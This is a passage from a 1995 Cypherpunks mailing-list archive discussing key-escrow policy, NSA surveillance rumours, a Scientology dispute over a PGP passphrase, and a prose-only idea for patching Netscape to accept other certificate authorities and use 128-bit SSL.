international escrow agents. He used the phrase "unlimited algorithms and keyspace" as a requirement. They also need buy in from their regulators, and presented a long list of SEC, CFT, NYSE, NASDealers, and 50 state regulators, all who have to sign off. Nanette DiTosto of Bankers Trust gave a short, to the point presentation. She said that BT has a commercial key escrow service, but that was not what she wanted to get accross. She said that multinational banks demand strong encryption and non-US escrow agents. And that they would settle for nothing less. A speaker from VTW gave a nice presentation. VTW is something like voter's telecommunications watch. They have a mailing list, at listproc at vtw.org. He said that escrow was doomed to failure. That there is no middle ground. I'll try to get his slides too. Jack Wack of TECSEC gave a pitch for his shrinkwrapped product. He said it is exportable now, they've jumped through all the hoops. He also gave a great crack from his son. It want roughly like: "Dad, if you own the data before you encrypt it, how come the government says you don't own it after you encrypt it?" It brought down the house. (if someone has a more accurate quote, please let me have a copy). Professor Hoffman of George Washington gave a great speach. He listed the Al Gore to Maria Cantwell letter's criteria, as a matrix. He then filled in the matrix with the Export GAK's criteria. It was painfully obvious that the NIST/NSA propsal didn't come close. He recommended that they focus closly on the Gore criteria, and come up with an approach that meets all the the criteria. While I planned on staying for the remainder of the meeting, a crisis came up at my day job. I can't say I was looking forward to more, a day and a half was enough for me, and I wasn't the only person leaving early. Attendance was down visibly Thursday relative to the first day Pat -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBMFBGEbCsmOInW9opAQEfQgP+P/P0MRGe3EOElzM0UPQy+xce0XGe3wex gfQdTrGWhL+FbYt/7taj6jgtcRg9zih1yQ3W+kN/VUXY9J4I1b6dw+j0sb6MkCjT pShnflDI5OPQmmUq9KZlmy50u2yXuBqfWSdXd9NypjDsh7XDrWIqvqIcuT1cc/di quNZ3u7aymw= =oJC7 -----END PGP SIGNATURE----- p.s. please let me know if this one's pgp sig is better than yesterday's Pat Farrell grad student http://www.isse.gmu.edu/students/pfarrell Infor. Systems and Software Engineering, George Mason University, Fairfax, VA PGP key available via finger or request #include standard.disclaimer From akjoele at shiva.ee.siue.edu Fri Sep 8 07:12:45 1995 From: akjoele at shiva.ee.siue.edu (Arve Kjoelen) Date: Fri, 8 Sep 95 07:12:45 PDT Subject: ON OFF-TOPIC Message-ID: <199509081412.JAA05507@shiva.ee.siue.edu> On Thu, 7 Sep 1995 yihchun at saul3.u.washington.edu wrote: > > Poor you, the only major political party to come out with a pro crypto > > statement is a socialist party. >I think the libertarian position is inherently pro-crypto. >Besides, the French are socialist, and well, as far as crypto goes... Wrong! First of all, Jacques Chiraq (French President) and the majority of the French parliament are conservatives. Secondly, a statement like "the French are Socialist" is a (untrue) generalization. You are probably thinking of Francois Mitterand ("socialist"), who became French President in the 80's, and the first French Socialist President ever. Chiraq, by the way, is the genius behind the recommencement of Nuclear testing in French Polynesia "Test them in France if there's no risk of radioactive leakage" -Arve Kjoelen Southern Illinois University at Edwardsville From cme at TIS.COM Fri Sep 8 07:27:03 1995 From: cme at TIS.COM (Carl Ellison) Date: Fri, 8 Sep 95 07:27:03 PDT Subject: Jimmy Upton's T-shirt (NIST's 9/6-7/95 meetings) Message-ID: <9509081402.AA09452@tis.com> The meetings included break-out groups, each of which had a moderator (mine was from NSA -- were they all?) and each of which had a recorder who would then report to the entire assembled group. Jimmy was a recorder once -- one of the last to report on the second day. Nearly every person speaking from industry started his remarks with the same disclaimer: My comments on these criteria should not be taken as an endorsement of the concept of key escrow Jimmy Upton, rather than start his report with that disclaimer, suggested that perhaps we should have T-shirts made for conference attendees stating: "My comments on these criteria...." The crowd broke up in laughter and applause. Speaking of applause -- the assembled audience was relatively passive through most of the presentation -- but whenever someone expressed opposition to the whole concept of GAK, the entire auditorium applauded. Specifically -- I was sitting near the civil liberties group (ACLU, EPIC, VTW, ...) and they applauded but it came from all over the auditorium. There were some who didn't -- the gov't folks, a few industry folks, .... - Carl P.S. I've put a few additions on my home page, in response to this meeting. +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme/home.html | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +----------------------------------------------------------- Jean Ellison -+ From nobody at REPLAY.COM Fri Sep 8 07:35:28 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 8 Sep 95 07:35:28 PDT Subject: Cryptography Global Challenges Message-ID: <199509081435.QAA06954@utopia.hacktic.nl> International Cryptography Institute 1995 Global Challenges Thursday-Friday September 21-22, 1995 Presented by The National Intellectual Property Law Institute 1815 Pennsylvania Ave., N.W. Washington, D.C. 20006 202-842-4800 Fax: (202) 296-4098 President James P. Chandler Emeritus Professor of Law _______________________________________________________ The International Cryptography Institute will address the cryptography challenges associated with meeting the information protection needs of users and the law enforcement and national security needs of nations. Topics to be covered include national and international cryptography policies and regulations, international requirements and approaches, commercial cryptography, privacy and trust, key escrow encryption, busines requirements, law enforcement requirements, and the use of cryptography with electronic payments. _______________________________________________________ Keynote Speaker FBI Director Louis J. Freeh _______________________________________________________ Program September 21, 1995 8:30-9:00 Welcome and Opening Remarks James Chandler, President, National Intellectual Property Law Institute Dorothy E. Denning, Chair of Program David Kahn, Visiting Historian, National Security Agency, U. S. 9:00-9:40 Cryptography in Business M. Blake Greenlee, U.S. 9:40-10:20 Commercial Use of Cryptography Nick Mansfield, Shell International, The Netherlands 10:20-10:50 Break 10:50-11:20 Computer Industry Position on Privacy and Trust in an Information Society Yves Le Roux, Digital Equipment Corporation, France 11:20-12:00 The International Cryptography Experiment and Worldwide Cryptographic Products Survey David Balenson, Trusted Information Systems, Inc., U.S. 12:00-12:30 Export Controls on Encryption Software Ira Rubenstein, Microsoft Corp., U.S. 12:30-2:00 Lunch with Keynote Louis J. Freeh, Director, Federal Bureau of Investigation 2:00-3:00 Cryptography and the Information Society: Recent Developments in the European Union David J. Gould, Cabinet Office, UK 3:00-3:30 Encryption Policy and Technology in Japan Mitsuru Iwamura, The Bank of Japan, Japan 3:30-3:50 Break 3:50-4:30 Towards an Australian Policy on Encryption Peter Ford, Attomey General's Department, Australia 4:30-5:00 New National Encryption Policies and Regulations in Russia Anatoly Ledbeder, LAN Crypto Ltd., Russia 5:00-6:00 International Regulation of Cryptography: An Update James Chandler, National Intellectual Property Law Institute, US. 5:30-6:30 Reception _______________________________________________________ September 22 8:30-9:20 U.S. Government Cryptography Policy Michael R. Nelson, Office of Science and Technology Policy, US. Ronald D. Lee, National Security Agency, US. 9:20-10:10 Law Enforcement Requirements for Encryption William E. Baugh, Jr., Edward L. Allen, Michael D. Gilmore, Federal Bureau of Investigation, US. 10:10-10:40 Break 10:40-11:20 Intemational Key Escrow Encryption Dorothy E. Denning, Georgetown University, US. 11:20-12:00 Transnational Key Escrow Henry H. Perritt, Jr., Villanova University School of Law, US. 12:00-1:30 Lunch 1:30-3:00 Commercial and International Key Escrow Stewart A. Baker, Steptoe & Johnson, US., moderator Stephen T. Walker, Trusted Information Systerns, Inc, US. Frank Sudia, Bankers Trust Company, US. Carmi Gressel and Itai Dror Fortress U & T Ltd., Israel 3:00-3:20 Break 3:20-4:00 Billing and Paying Over the Internet Dan Schutzer, Citibank, US. _______________________________________________________ Faculty Faculty Chair Dr Dorothy Denning Mr. Edward L. Allen Supervisory Special Agent Federal Bureau of Investigation Mr. Stewart Abercrombie Baker Partner Steptoe & Johnson Mr. David Balenson Senior Computer Scientist Trusted Information Systems, Inc. Mr. Wllliam E. Baugh, Jr. Assistant Director, Information Resources Division Dr. Ernest F. Brickell Vice President Bankers Trust Electronic Commerce c/o Sandia National Labs Applied Math Dept. Prof. James Chandler President National Intellectual Property Law Institute Dr. Dorothy E. Denning Professor Computer Science Department Georgetown University Mr. Peter Ford First Assistant Secretary, Security Division Attorney General's Department Australia Mr. Louis J. Freeh, Director Federal Bureau of Investigation Mr. Michael D. Gilmore Supervisory Special Agent Federal Bureau of Investigation Engineering Research Facility Mr. David J. Gould Under Secretary of State Overseas and Defence Secretariat Cabinet Office, London Mr. M. Blake Greenlee M. Blake Greenlee Associates. Ltd. Dr. Carmi Gressel Engineering Manager Fortress U & T, Ltd. Israel Mr. David Kahn Visiting Historian National Security Agency, and author, "The Codebreakers" Dr. Anotoly Lebedev President LAN Crypto, Ltd. Russia Mr. Mitsuru Iwamura Chief Manager Institute for Monetary and Economic Studies The Bank of Japan Mr. Ronald D. Lee General Counsel National Security Agency Mr. Yves Le Roux Central Engineering, Security Program Digital Equipment Corp. France Mr. Nick Mansfield Shell International Petroleum Mattschappij B.V. The Hague The Netherlands Mr. Michael R. Nelson Special Assistant, Information Technology White House Office of Science and Technology Policy Old Executive Office Building. Washington DC 20506 Mr. Henry H. Perritt, Jr. Professor of Law Villanova University School of Law Villanova, PA 19085 Mr. Ira Rubinstein Senior Corporate Attorney Microsoft Corp Redmond, WA 98052 Dr. Dan Schutzer Vice President Citibank Dr. Frank Sudia Vice President BT Electronics Commerce Bankers Trust Co., New York Mr. Stephen T. Walker President Trusted Information Systems, Inc. _______________________________________________________ Location and Fees ICI '95 will be held at the National Intellectual Property Law Institute, 1815 Pennsylvania Ave., Washington, DC, third floor. Registration is $695 before September 1 and $795 thereafter ($395/495 for U.S. Government). Payment includes all conference materials, two lunches, and a cocktail reception. Cancellations Fees: All registration is subject to a $50 fee. Tuition will not be refunded if notice of cancellation is received after September 1. 1995, but a substitute attendee may be sent. Postmarks will not be considered in determining timeliness of receipt. Hotel Accommodations: A limited block of rooms has been reserved at the Wyndam Bristol. However, registrants must make their own hotel reservations and indicate that they are attending the International Cryptography Institute 1995. Room reservations may be made by calling or writing the Wyndam Bristol Hotel, 2430 Pennsylvania Ave.. N.W. Washington, D.C. 20006 (202) 955-6000. CLE Credit: CLE credit in mandatory states will be applied for as requested. _______________________________________________________ Course Registration Form Name: Organization: Address: Phone: Fee: General US. Gov't Before 9/1/95 $695 $395 After 9/1/95 $795 $495 Payment (check one) Check payable to The National Intellectual Property Law Institute _______ Master Card ________VISA Card # Expiration Date: Signature: Registration by Fax: 800-304-MIND Phone: 800-301-MIND 202-296 4098 202-842-48000 Mail Registration with payment to: The National Intellectual Property Law Institute 1815 Pennsylvania Ave., NW, Suite 300 Washington, DC 20006 _______________________________________________________ From perry at piermont.com Fri Sep 8 07:55:26 1995 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 8 Sep 95 07:55:26 PDT Subject: Darren Reed: Re: NSA and the Internet. Message-ID: <199509081455.KAA07149@frankenstein.piermont.com> Forwarded from com-priv. Anyone out there have information they can use to confirm or deny any of this? .pm ------- Forwarded Message From: Darren Reed Subject: Re: NSA and the Internet. To: com-priv at lists.psi.com Date: Fri, 8 Sep 1995 17:36:11 +1000 (EST) Now that I've got it next to me... > I was reading a journal recently which mentioned the NSA were taking > an active role in monitoring the network at key points, such as FIX > East and West and MAE East and West. Can anyone comment on this (if > they're allows :) ? [...] To name some more names mentioned as being NAPs under surveillance: Pennsauken, NJ (Sprint); Chicago (AmeriTech/Bell Comms. Research); San Francisco, CA (Pacific Bell); CIX, CA (San Jose); SWAB, North Virginia (Bell Atlantic). There is a rather worrying quote in the article about NASA capturing data for the NSA. The column closes with a comparison to a case where the NSA was almost prosecuted by the US Justice Dept. in the '70s for anti-Vietnam War group surveillence. The article appeared in "Computer Fraud & Security", June 1995. American editor is: Charles Cresson Wood information Integrity Investments Sausalito, CA, USA The article in question, titled "Puzzle Palaze Conducting Internet Surveillance" is by Wayne Madsen of Virginia. No Internet E-mail address listed for either of the American contriubtors mentioned above. darren ------- End of Forwarded Message From remailer at bi-node.zerberus.de Fri Sep 8 08:14:53 1995 From: remailer at bi-node.zerberus.de (Ford Prefect) Date: Fri, 8 Sep 95 08:14:53 PDT Subject: No Subject Message-ID: NY Times, Sept 8, 1995. Intel Wins Contract to Develop World's Fastest Supercomputer By Lawrence M. Fisher San Francisco, Sept. 7 -- The Intel Corporation said today that it had won a a contract from the Department of Energy to develop what it called the world's fastest supercomputer. The machine, to be built at an estimated cost of $45 million, would use 9,000 of Intel's forthcoming P6 microprocessors linked in a configuration known as massively parallel. In recent years, massively parallel computers using thousands of relatively inexpensive off-the-shelf chips have stolen the performance lead from traditional supercomputers like those made famous by Cray Research Inc., which use far fewer, but far more powerful processors. Intel said its new supercomputer would be the first to achieve the goal of calculating more than a trillion floating-point operations a second, known as a teraflop. The machine, to be kept at Sandia National Laboratories In Albuquerque, N.M., would be used by Department of Energy scientists to study a variety of complex problems, foremost among them nuclear weapons safety. "President Clinton is committed to ending underground nuclear testing," Victor Reis, Assistant Secretary for Energy Programs, said in a statement. "Computer simulation will be a principal means for insuring the safety, reliability and effectiveness of the U.S. nuclear deterrent. We are embarking on a 10-year program to advance the state of high performance computing to meet national security objectives," he said. ... ------ From rsalz at osf.org Fri Sep 8 08:25:37 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 8 Sep 95 08:25:37 PDT Subject: Darren Reed: Re: NSA and the Internet. Message-ID: <9509081524.AA09579@sulphur.osf.org> I stopped reading com-priv a year+ ago. One of the "gadflies" back then (name escapes me -- one of the journalists, I think, but not Gordon Cook) said that at least the NJ NAP was moved at the last minute. He had proof of that. I don't remember that he had proof that it was moved at NSA request, although that was his claim. /r$ From patrick at Verity.COM Fri Sep 8 08:43:59 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Fri, 8 Sep 95 08:43:59 PDT Subject: No Subject Message-ID: <9509081540.AA08797@cantina.verity.com> How much you want to bet that a first copy goes to virginia? Patrick > > NY Times, Sept 8, 1995. > > > Intel Wins Contract to Develop World's Fastest > Supercomputer > > By Lawrence M. Fisher > > > San Francisco, Sept. 7 -- The Intel Corporation said > today that it had won a a contract from the Department of > Energy to develop what it called the world's fastest > supercomputer. > > > The machine, to be built at an estimated cost of $45 > million, would use 9,000 of Intel's forthcoming P6 > microprocessors linked in a configuration known as > massively parallel. In recent years, massively parallel > computers using thousands of relatively inexpensive > off-the-shelf chips have stolen the performance lead from > traditional supercomputers like those made famous by Cray > Research Inc., which use far fewer, but far more powerful > processors. > > > Intel said its new supercomputer would be the first to > achieve the goal of calculating more than a trillion > floating-point operations a second, known as a teraflop. > The machine, to be kept at Sandia National Laboratories > In Albuquerque, N.M., would be used by Department of > Energy scientists to study a variety of complex problems, > foremost among them nuclear weapons safety. > > > "President Clinton is committed to ending underground > nuclear testing," Victor Reis, Assistant Secretary for > Energy Programs, said in a statement. "Computer > simulation will be a principal means for insuring the > safety, reliability and effectiveness of the U.S. nuclear > deterrent. We are embarking on a 10-year program to > advance the state of high performance computing to meet > national security objectives," he said. ... > > > ------ > > > _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From perry at piermont.com Fri Sep 8 08:51:30 1995 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 8 Sep 95 08:51:30 PDT Subject: No Subject In-Reply-To: <9509081540.AA08797@cantina.verity.com> Message-ID: <199509081551.LAA07222@frankenstein.piermont.com> Patrick Horgan writes: > How much you want to bet that a first copy goes to virginia? I'm not sure that the NSA actually would want machines on that scale these days. Its probably a lot more economical to throw your money into lots of much smaller machines and occassionally link them up via networks. Unlike physics simulation problems, most crypto problems don't involve tight communication between the parallel processors, so the extra expense that the high speed buses represent would end up being a waste. Perry From stewarts at ix.netcom.com Fri Sep 8 09:11:00 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 8 Sep 95 09:11:00 PDT Subject: [NOISE] Re: Are booby-trapped computers legal? Message-ID: <199509081610.JAA08664@ix5.ix.netcom.com> At 04:52 PM 9/7/95 -0400, you wrote: >I am pretty sure that it is lawful to use deadly force to protect >property, in New Mexico. It's legal everywhere in the US - just some places make you contract out the dirty work to guys in blue suits... I agree with Sandy's comment that it makes much more sense to have any boobytraps designed to destroy data, rather than kill intruders. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From hfinney at shell.portal.com Fri Sep 8 09:12:45 1995 From: hfinney at shell.portal.com (Hal) Date: Fri, 8 Sep 95 09:12:45 PDT Subject: GAK Hacks Message-ID: <199509081611.JAA05733@jobe.shell.portal.com> It is interesting to see that the proposed solutions to avoiding GAK hacks (URL:http://www.eskimo.com/~joelm/criteria.txt) largely revolve around certificate restrictions. Only keys signed with certificates from accepted escrow agencies can be used, and there is a "root certificate" used to authorize new escrow agencies. This is similar to some of the restrictions in the widely used Netscape web browser. It only accepts certificates from a limited number of agencies (actually only one which is public, the RSA spinoff VeriSign). This limitation is not based on escrow approval as in the GAK papers, but it ends up with something of the same results: interoperability with Netscape is only possible if you go through approved channels. And supposedly VeriSign does not make it too easy to get a certificate if you are not a straight-arrow corporate type. Maybe it would be good practice for a future GAK hack to try fixing these problems with Netscape. I could see two possibilities. One would be to create a patcher which would let you change the set of certificate authorities accepted by the browser. Currently the browser accepts at least one (an internal Netscape test CA) which is not needed by end users. Maybe its public key could be statically overwritten by the patch program with the public key of the replacement CA. This sounds simple and safe. The patch program can confirm that the data being changed matches the test CA. Another idea would be to patch the browser to emit full 128 bit SSL rather than the crippled 40 bit SSL it currently creates. This would be trickier as it requires code changes, but they may not be as bad as it seems. The 40 bit SSL is actually calculated as 128 bits internally. Then 88 bits are sent in the clear. We would need to skip sending those 88 bits, and also change the transmitted bytes which encode which encryption is being used. This shouldn't be too bad as it mostly would eliminate code or change some static values. The one thing I am unsure of is whether the 40 bit version sends the entire 128 bit SSL key in the RSA encrypted data (88 bits of which would be redundant, also being sent in the clear) or whether it sends only the 40 bits RSA encrypted. If the latter it would be somewhat more work to do the patch because now a larger value will have to be packed into the RSA record. If it is sending the 128 bits all the time then the patch would be much easier. This second patch is more advantageous for end users as it allows them to have strong encryption rather than the weak 40 bits which we have been breaking. The first would be a more direct demonstration of the difficulties of using certificate restrictions to limit functionality. The criteria.txt paper suggests checksumming the cryptographic routines to prevent patches like this, but generally I think such checksums can be defeated pretty easily. I doubt that Netscape currently has any such thing, though. Netscape says they will allow some form of user specification of certificates in a future version of the browser, but they have been saying this for quite some time and still it is not here. Hal From andrew_loewenstern at il.us.swissbank.com Fri Sep 8 09:16:08 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 8 Sep 95 09:16:08 PDT Subject: Scientology tries to break PGP - and fails? Message-ID: <9509081615.AA03382@ch1d157nwk> Modemac writes: > Yet it seems that despite all their efforts to get what they want, > they can't break PGP - so they have to force Wollersheim to reveal > the key. > Mr. Wollersheim has stated that he will go to jail before he reveals > his encryption key. [...snip...] > Call this one: BIG WIN FOR PGP! Could this be it? The test case for forced key disclosure? The Scientologists seem very determined and already have a grudge against Wollersheim (according to a web page I saw Co$ owes him several million from a settlement). Has Co$ filed against Wollersheim over this yet? If this does go to court and forcing Wollersheim to reveal the key becomes a central issue, is this the test case "we" want? Is this a "BIG WIN FOR PGP!" or not? I can think of worse cases for this to come up in. I.E. a four horseman case. Here the party seeking forced disclosure of the key (Co$) is presumably already held in low esteem by much of the public (IMHO). I suppose how this will play in the media, if at all, depends on what the "church" thinks Wollersheim has hidden in his encrypted data files. It seems that the US media hasn't picked up much on the Scientology debacle yet... or am i wrong? andrew From trollins at hns.com Fri Sep 8 09:22:24 1995 From: trollins at hns.com (Tom Rollins) Date: Fri, 8 Sep 95 09:22:24 PDT Subject: Scientology tries to break PGP - and fails? In-Reply-To: <199509080312.UAA03808@netcom15.netcom.com> Message-ID: <9509081620.AA19816@dcn92.hns.com> > > News Flash! > > According to an informed source, the so-called "church" of Scientology is > trying to force Larry Wollersheim to give them his de-encryption code for > PGP. > > Larry Wollersheim is the director of FACTNet, a Colorado BBS that > specializes in distributing information about religious cults - > especially the Church of Scientology. Scientologists raided FACTNet > recently and seized its hardware and records recently, in a case that has > spread news of the Scientology wars all over the Internet. > > Scientology has been in possession of Larry Wollersheim's computer > records for quite a while now - at least three weeks, I believe. They > have been scanning it for what they claim to be "copyright violations." > Yet, their list of scanning criteria also includes a list of 34 names of > their critics and enemies, including a famous Netizen named "Rogue Agent." > > Yet it seems that despite all their efforts to get what they want, they > can't break PGP - so they have to force Wollersheim to reveal the key. > > Mr. Wollersheim has stated that he will go to jail before he reveals his > encryption key. > > Please forward this note to all interested parties. > > Call this one: BIG WIN FOR PGP! > > For more information on Scientology's war against the Internet, read the > many Web pages set up to cover the story. My own page, an "Introduction > to Scientology," is: > > http://www.tiac.net/users/modemac/cos.html > > It includes a link to the FACTNet Web page, as well as Ron Newman's > famous Web page: "The Church of Scientology vs. the Net." > I took a look at the FACTNet web page. There is a file encrypted with PGP using the "-c" option. They are asking for people to help guess the Pass Phrase. Why would anyone bother if they had no clue that the file contained anything 'interesting'. If this is the file that the Co$ is trying to crack, then what the is being asked for is a pass phrase that can be handed to the Co$ that will pass the PGP valid key check and still not decrypt the data to anything usefull. If Larry Wollersheim does have the valid key. It would be a simpler process to know what fake key to use and work it backwards through the MD5 to arrive at an ascii string to produce the fake key. Too bad this wouldn't be plausable for the secret ring. Perhaps PGP needs an option to specify the key in Hex and make the process easy. From nobody at REPLAY.COM Fri Sep 8 09:48:43 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 8 Sep 95 09:48:43 PDT Subject: Info Warthogs Message-ID: <199509081648.SAA08525@utopia.hacktic.nl> Future Information Warfare Study Available San Francisco, Sept. 6, 1995 -- Computer Security Institute's "Special Report on Information Warfare" describes how war might be fought in the 21st century. The report will appear in the fall issue of the Computer Security Journal, but is available now on request. Patrice Rapalus, director of Computer Security Institute (CSI), told Newsbytes, "In recent weeks, mass media organizations such as Time Magazine, the Washington Post, and National Public Radio have done stories on information warfare. This report is a timely, comprehensive and practical study on information warfare and its impact on our future." The report defines information warfare in contrast to simple computer crime, "A computer crime is an act that violates a law. It could be specifically targeted. It could be isolated, or it could be one element of an overall plan of attack. The conduct of information warfare, in contrast, is never random or isolated (and may not even violate a law). The term implies a concerted effort to utilize information as a weapon with which to wage war, whether on an actual battlefield or in economic, political, or social arenas." Four aspects of information warfare are listed in the report: the electronic battlefield; infrastructure attacks; industrial espionage; and personal privacy attacks. "It is important to understand that the term 'information warfare' originated in the military and in its purest sense refers to the grim and dangerous business of real...country shattering war," says the report. Computer Security Institute is located in San Francisco, California, and is a wholly owned subsidiary of Miller Freeman Publishing. Miller Freeman publishes over fifty trade magazines including Dr. Dobbs Journal, Unix Review, and LAN Magazine. Computer Security Institute publishes, along with random studies like the "Special Report on Information Warfare," a monthly newsletter, a semi-annual Journal, an annual Buyers Guide, and a on-line bulletin board. To obtain an advance copy of "Special Report on Information Warfare," call 415-905-2310. ------ "Snooper" Software Digs Into Computers San Francisco, Sept. 6, 1995 -- Vias & Associates Inc. said it has introduced a new version of its "Snooper" system information utility. The author of the software said it is called Snooper because the program "snoops" around the computer to report its configuration and operating characteristics. John Vias of Vias & Associates said his company's program goes farther than other system information programs, including Microsoft's MSD (Microsoft System Detection), which is included in higher versions of the company's DOS operating systems. "I think Snooper is about the most accurate system information utility you can get," he said. "People say it's easy to use. It takes just one keystroke to go from the main screen to any other screen. It also has a built-in editor for 'autoexec' and 'config' files." In all, Snooper can detect more than 150 details about a person's computer, including CMOS settings, hard drive type and capacity, any installed Micro Channel cards, fax-modems, memory types and amount available to the user, and video memory and type. Snooper is targeted to all markets, Vias officials said, including the average user, network administrators, consultants, and technicians. In the provided documentation is a wish list regarding new features for future versions of Snooper, including brand detection of additional non-Intel central processing units (CPUs), detection of local bus cards and tapes, and the ability to differentiate among different types of hard drives. Although Snooper can run in either DOS or Windows, Vias said the program works best in the DOS environment. In Windows, some of the software's reports must be disabled. In addition, some of the test results may be in error or unpredictable. Snooper requires an IBM PC or 100% compatible machine, with at least 256 kilobytes (KB) of RAM, a DOS with version 3.1 or higher, and some kind of video card. Snooper retails for around $39, and is available as both a full version and as shareware. Vias also said he is working hard on a Windows 95 version of Snooper. When tested the software on a Windows 95 machine running in DOS mode, no problems were experienced. But running it in Windows mode made the program very unpredictable. ------- UK - PCMCIA Encryption Card Introduced London, Sept. 5, 1995 -- PPCP, a PCMCIA (Personal Computer Memory Card International Association) specialist, has begun shipping the Session Key, a PCMCIA Type II card from SCI Canada. According to John Nolan, the company's managing director, the card allows users to encrypt data on their PC hard disk, as well as across serial port linked devices, such as modems, using the DES algorithm. DES stands for Data Encryption Standard, a US-originated high security encryption system that is virtually unbreakable. According to Nolan, the Session Key allows users to protect their data on a selective basis. "Many of the competing systems out there are only capable of encrypting the user's entire hard disk. That obviously protects the user's data, but if you forget your password, you have serious problems," he explained. "With the Session Key card, you create a new drive, the 'D' drive, to store the encrypted data. The card also allows data to be transmitted by modem in DES format. That allows a user maximum flexibility," he said. When used to encrypt data on a user's hard disk, once the Session Key is removed from the PCMCIA slot, all data on the disk that is encrypted is protected against unauthorized access. The encrypted data cannot be read or used without reinserting the UKP349 card. Nolan said that SCI has developed a second-generation version of the Session Key, which will be available later this year. "That version will use RSA encryption techniques, as well Triple DES and a whole host of other encryption systems," he said. One of the problems with encryption devices like the Session Key is the fact that the US Government currently bans the export of certain types of encryption technologies, as well as restricts the sale of many technologies to "known parties." According to Nolan, this approval system can cause the company a few administrative problems. "We need to find out who is the actual end-user and pass their details back to SCI. My understanding is that the vetting is then carried out at a government level in Canada or the US," he said. He added that, apart from a short delay, typically a week or so before the card can be shipped to the customer, there is usually no problem. Reader Contact: PPCP, tel +44-181-893-2277, fax +44-181-893-1182, Internet e-mail 100302.1470 at compuserve.com/PPCP950905/PHOTO) ------ From andrew_loewenstern at il.us.swissbank.com Fri Sep 8 09:55:01 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 8 Sep 95 09:55:01 PDT Subject: Scientology tries to break PGP - and fails? Message-ID: <9509081654.AA03407@ch1d157nwk> Tom Rollins writes: > If this is the file that the Co$ is trying to crack, then what the > is being asked for is a pass phrase that can be handed to the Co$ > that will pass the PGP valid key check and still not decrypt the > data to anything usefull. Well, I don't have the PGP 'conventional' encryption format memorized, but there is probably a constant after the IV that is prepended to the data. The constant is used to determine if the key is correct. Since the conventional encryption runs in CFB mode and there is a full block of random IV at the beginning of the file, it is extremely unlikely that a key could be found that would properly decrypt only the first two blocks while leaving the rest unreadable... > If Larry Wollersheim does have the valid key. It would be a simpler > process to know what fake key to use and work it backwards through > the MD5 to arrive at an ascii string to produce the fake key. Not really. Even if you could find an IDEA key that would produce the desired output it would be hard to find a passphrase that would produce that key when hashed. One of the properties of one-way hash functions is that it is difficult to find a plaintext that produces a given hash. Hence the term 'one-way'.... Even if you did find a passphrase (which, if MD5 is strong, would require something like 2^64 operations), it would likely be long, have 8-bit chars, and would be impossible to type in. It would be tough to convince anyone that it was the real passphrase. andrew From Andrew.Spring at ping.be Fri Sep 8 10:02:18 1995 From: Andrew.Spring at ping.be (Andrew Spring) Date: Fri, 8 Sep 95 10:02:18 PDT Subject: GAK Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Brian Davis Wrote: > >I, of course, know of the "dislike" of GAK here. I am curious to know, >however, if the "dislike" is because government would have access under >any circumstances or if the primary worry is that government will cheat >and get access when most would agree that they shouldn't (either by the >judge "cheating" or a TLA stealing it). > >In other words ... if it took agreement by a review board composed of >non-LEA members of this list, would the escrow be acceptable?? > Looking at it simply as a cryptosystem, I'd have to vote no, since the security of the system can be "easily" (in a cryptographic sense) compromised. I feel safer knowing my privacy is protected by the laws of mathematics, instead of the laws of the USA. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBME9jIs3xoLPBSgtxAQEndAf/V9hJEyMIHe6/h2UmEWT4KH81Y/HuBHZr kuiHIRNFRGgsYKFIk72YGBltZvbPeWcX15RmGB6DO+91ecfmRMplW14RYAQyPpcx AGC3rQ966hZ/mRHRi7Ygtw1tbRKgbDAaNzx468TRZGwl2LxexpbxzOZoy2kMR18M +Kj6sLahlQxyTO6jx26uoj5uqmfdnxFAfjUDWAjLyhjH5x7XzqpJHQHKSFGIsdKY X1tw7IPPDUElXJkdx0aVMhOFwEen3XGm3qrx/kJRmnG7Q9WoAHE5xqOLSAHyYImd PaUT63Uzgop7euL4FROHqrIrlh70IPiWCk7t7OEwT8CS3MbbL/WgjQ== =hYy7 -----END PGP SIGNATURE----- From bdolan at use.usit.net Fri Sep 8 10:05:26 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Fri, 8 Sep 95 10:05:26 PDT Subject: Hacking banking (fwd) Message-ID: ---------- Forwarded message ---------- Date: Fri, 8 Sep 95 15:21:00 UTC From: d.wiesner at genie.geis.com Subject: Hacking banking An interesting article appeared on Page B1 of the 9/7/95 San Francisco Examiner. Titled "Keystroke Cops," it discusses the FBI's new cyberswat team. In the midst of a routine discussion of whether law enforcement needs to keep up with cyberspace criminals, the following intriguing quote appeared. "Already, Fuentes said, federal authorities in New York are investigating whether programmers hired to write software for a financial institution may have left a 'back door' open in the program, one through which money may have been diverted to foreign bank accounts." Does anyone know what this federal investigation in New York is about? How about copying this note around and seeing what people can find out? David Wiesner ---- My pleasure, Dave. bd From andrew_loewenstern at il.us.swissbank.com Fri Sep 8 10:05:58 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 8 Sep 95 10:05:58 PDT Subject: GAK Hacks Message-ID: <9509081705.AA03422@ch1d157nwk> Hal writes: > One would be to create a patcher which would let you change the > set of certificate authorities accepted by the browser. Currently > the browser accepts at least one (an internal Netscape test CA) > which is not needed by end users. Maybe its public key could be > statically overwritten by the patch program with the public key of > the replacement CA. This sounds simple 